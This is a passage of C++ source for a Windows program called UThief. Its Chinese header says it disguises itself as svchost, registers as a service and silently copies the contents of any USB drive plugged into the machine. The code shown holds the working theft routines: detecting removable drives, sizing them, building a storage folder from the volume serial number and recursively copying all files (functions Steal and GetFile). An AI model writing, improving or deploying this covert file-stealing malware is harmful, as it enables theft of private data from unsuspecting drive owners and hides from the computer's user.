service.cpp

伪装成svchost进程,在windows服务里添加服务,对连接到电脑的U盘进行定时扫描,将其复制到电脑里默认的目录里

	itoa(st.wYear, szTime, 10);
	strcpy(sTime, szTime);
	itoa(st.wMonth, szTime, 10);
	strcat(sTime, szTime);
	itoa(st.wDay, szTime, 10);
	strcat(sTime, szTime);

	return sTime;
}

string UThief::EraseLastChar(const string Str, string sChar)//去掉在string末尾的指定字符
{
	string workedStr = Str;
	if (workedStr.find(sChar) != string::npos)
	{
		while(workedStr.substr(workedStr.rfind(sChar), workedStr.length()) == sChar)
		{
			workedStr = workedStr.substr(0, workedStr.rfind(sChar));
		}
	}

	return workedStr;
}

string UThief::GetString(const string Str, string sChar, bool bIsFirst)//获取string里以指定字符分隔的子字符串
{
	string workedStr = Str;
	if (workedStr.find(sChar) != string::npos)
	{
		if (bIsFirst)
		{
			workedStr = workedStr.substr(0, workedStr.rfind(sChar));
		}
		else
		{
			workedStr = workedStr.substr(workedStr.rfind(sChar) + sChar.length(), workedStr.length());
		}
	}
	else
	{
		workedStr = "";
	}

	return workedStr;
}

TCHAR* UThief::string_to_char(const string Str)//把string转换为char*
{
	string workedStr = Str;
	int nStrLen = workedStr.length();
	TCHAR* pStr = new TCHAR[nStrLen + 1];
	workedStr.copy(pStr, nStrLen, 0);
	pStr[nStrLen] = '\0';

	return pStr;
}

bool UThief::CheckDisk(const TCHAR* sDisk)//检测驱动器是否为可移动储存器
{
	if (::GetDriveType(sDisk) == DRIVE_REMOVABLE) return true;
	return false;
}

bool UThief::FileExists(const TCHAR* lpszFileName, bool bIsDirCheck)//检测文件(夹)是否存在
{
	bool reValue = false;
	DWORD dwAttributes = ::GetFileAttributes(lpszFileName);//获取文件属性
	if (dwAttributes != 0xFFFFFFFF)
	{
		if ((dwAttributes & FILE_ATTRIBUTE_DIRECTORY) == FILE_ATTRIBUTE_DIRECTORY)//判断是否为目录
		{
			if (bIsDirCheck)
				reValue = true;
			else
				reValue = false;
		}
		else
		{
			if (!bIsDirCheck)
				reValue = true;
			else
				reValue = false;
		}
	}
	return reValue;
}

void UThief::RecursiveDelete(const TCHAR* szPath)//递归删除某个目录下的所有文件(夹)
{
	TCHAR strPath[_MAX_PATH];
	WIN32_FIND_DATA FindFileData;
	HANDLE hFind;

	strcpy(strPath, szPath);
	strcat(strPath, "\\*");
	hFind = ::FindFirstFile(strPath, &FindFileData);//查找第一个文件

	if (hFind != INVALID_HANDLE_VALUE)
	{
		do
		{
			if (strcmp(FindFileData.cFileName, ".") != 0 && strcmp(FindFileData.cFileName, "..") != 0)
			{
				strcpy(strPath, szPath);//建立文件(夹)路径
				strcat(strPath, "\\");
				strcat(strPath, FindFileData.cFileName);

				::SetFileAttributes(strPath, FILE_ATTRIBUTE_NORMAL);//把文件属性设置为正常

				if (FileExists(strPath, true))//判断如果为目录则递归删除
				{
					RecursiveDelete(strPath);
					::RemoveDirectory(strPath);
				}
				else
				{
					::DeleteFile(strPath);//删除文件
				}
			}
		}while(::FindNextFile(hFind, &FindFileData));
	}
	::FindClose(hFind);
}

BOOL UThief::DeleteFileOrFolder(const TCHAR* szPath)//删除一个目录(空或非空)或者文件
{
	TCHAR strPath[_MAX_PATH];
	strcpy(strPath, szPath);

	if (FileExists(strPath))
	{
		::SetFileAttributes(strPath, FILE_ATTRIBUTE_NORMAL);
		try{return ::DeleteFile(strPath);}
		catch(...){return FALSE;}
	}
	else if (FileExists(strPath, true))
	{
		RecursiveDelete(strPath);
		if (strlen(strPath) > 3)
		{
			if (FileExists(strPath, true))
			{
				try{return ::RemoveDirectory(strPath);}
				catch(...){return FALSE;}
			}
		}
	}
	return TRUE;
}

BOOL UThief::CreateDir(const TCHAR* lpPathName, LPSECURITY_ATTRIBUTES lpSecutiryAttributes)//创建指定的目录路径, 如C:\a\b\c\d
{
	int nPos = 0;
	TCHAR szDirPath[_MAX_PATH];

	strcpy(szDirPath, lpPathName);//建立并格式化文件夹路径
	string sfPath = szDirPath;
	string ParentDir;
	sfPath = EraseLastChar(sfPath);

	if (FileExists(string_to_char(sfPath), true)) return TRUE;//如果文件夹存在则退出

	while ((nPos = sfPath.find("\\", nPos + 1)) != string::npos)//循环创建每一层文件夹
	{
		ParentDir = sfPath.substr(0, nPos);
		if (FileExists(string_to_char(ParentDir)))//如果存在同名文件则删除之
		{
			DeleteFileOrFolder(string_to_char(ParentDir));
		}
		if (!FileExists(string_to_char(ParentDir), true))//如果这层子文件夹不存在则创建
		{
			::CreateDirectory(string_to_char(ParentDir), lpSecutiryAttributes);
		}
	}
	if (FileExists(szDirPath))//最后检查一下是否整个路径目录创建成功
	{
		DeleteFileOrFolder(szDirPath);
	}
	return ::CreateDirectory(szDirPath, lpSecutiryAttributes);//尝试创建最后一层文件夹并返回结果
}

BOOL UThief::Copy(const TCHAR* szExitingFileName, const TCHAR* szNewFileName, BOOL bFailIfExists)//复制一个文件, 如果存在目标目录则删除之
{
	/*
	printf(szExitingFileName);
	printf(" -> ");
	printf(szNewFileName);
	printf("\n");
	*/
	if (FileExists(szNewFileName, true))//如果存在同名目录则删除之
	{
		DeleteFileOrFolder(szNewFileName);
	}

	BOOL bCopyFile;
	string strPath = szNewFileName;
	strPath = GetString(strPath);//获取文件所在目录路径
	if (!FileExists(string_to_char(strPath), true))//如果文件所在目录不存在则创建之
	{
		CreateDir(string_to_char(strPath), NULL);
	}
	bCopyFile = ::CopyFile(szExitingFileName, szNewFileName, bFailIfExists);//开始复制文件
	if (bCopyFile && FileExists(szNewFileName))//如果复制成功并且目标文件存在则把属性设置为正常
	{
		::SetFileAttributes(szNewFileName, FILE_ATTRIBUTE_NORMAL);
	}

	return bCopyFile;
}

void UThief::GetFile(const TCHAR* szPath, const TCHAR* szStorer)//递归获取指定目录下的文件并按目录结构复制到另一个目录
{
	TCHAR szSourcePath[_MAX_PATH];//源路径
	TCHAR szTargetPath[_MAX_PATH];//目标路径
	TCHAR* szAddedPath;
	WIN32_FIND_DATA FindFileData;
	HANDLE hFind;

	strcpy(szSourcePath, szPath);
	strcat(szSourcePath, "\\*");

	hFind = ::FindFirstFile(szSourcePath, &FindFileData);
	if (hFind != INVALID_HANDLE_VALUE)
	{
		try{
			do{
				if (StealStatus == 1) break;
				if (strcmp(FindFileData.cFileName, ".") != 0 && strcmp(FindFileData.cFileName, "..") != 0)
				{
					strcpy(szSourcePath, szPath);//建立新的源文件路径
					strcat(szSourcePath, "\\");
					strcat(szSourcePath, FindFileData.cFileName);

					//::SetFileAttributes(szSourcePath, FILE_ATTRIBUTE_NORMAL);

					if (FileExists(szSourcePath, true))//如果是目录则递归获取文件
					{
						GetFile(szSourcePath, szStorer);
					}
					else
					{
						strcpy(szTargetPath, szStorer);//建立目标文件路径
						szAddedPath = strchr(szSourcePath, '\\');
						strcat(szTargetPath, szAddedPath);

						Copy(szSourcePath, szTargetPath, TRUE);//复制文件到目标路径
					}
				}
			}while(::FindNextFile(hFind, &FindFileData));
		}catch(...){}
	}
	::FindClose(hFind);
}

void UThief::Steal()//检测所有驱动器, 如果是可移动储存器并且驱动器可用, 则开始盗取文件
{
	TCHAR DriveStr[4];
	TCHAR* dwVolume;
	string Storer;
	DWORD lod = GetLogicalDrives();//获取所有逻辑驱动器可用状态
	DWORD VolumeSN;
	ULARGE_INTEGER TotalBytes, FreeBytes;
	bool bIsTooMax;

	if (lod == 0) return;
	strcpy(DriveStr, "A:\\");
	for (int i = 0; i < 26; i++)//循环检测可能的26个驱动器
	{
		if (StealStatus == 1) break;
		if ((lod & 1) == 1)
		{
			DriveStr[0] = 'A' + i;
			if (CheckDisk(DriveStr))
			{
				if (GetVolumeInformation(DriveStr, NULL, 0, &VolumeSN, NULL, NULL, NULL, 0))
				{
					bIsTooMax = false;
					if (GetDiskFreeSpaceEx(DriveStr, NULL, &TotalBytes, &FreeBytes))//检测已用容量
					{
						if (TotalBytes.QuadPart - FreeBytes.QuadPart > STOP_MAX_DISKSPACE)
							bIsTooMax = true;
					}

					if (!bIsTooMax)
					{
						strcpy(DriveStr, "A:");
						DriveStr[0] = 'A' + i;

						dwVolume = new TCHAR[20];
						itoa(VolumeSN, dwVolume, 10);//获取目标驱动器的序列号
						Storer = dwVolume;
						delete []dwVolume;
						Storer = StorePath + "-" + Storer;//以驱动器的序列号建立目标路径

						GetFile(DriveStr, string_to_char(Storer));//开始获取文件
					}
				}
			}
		}
		lod = lod >> 1;
	}
}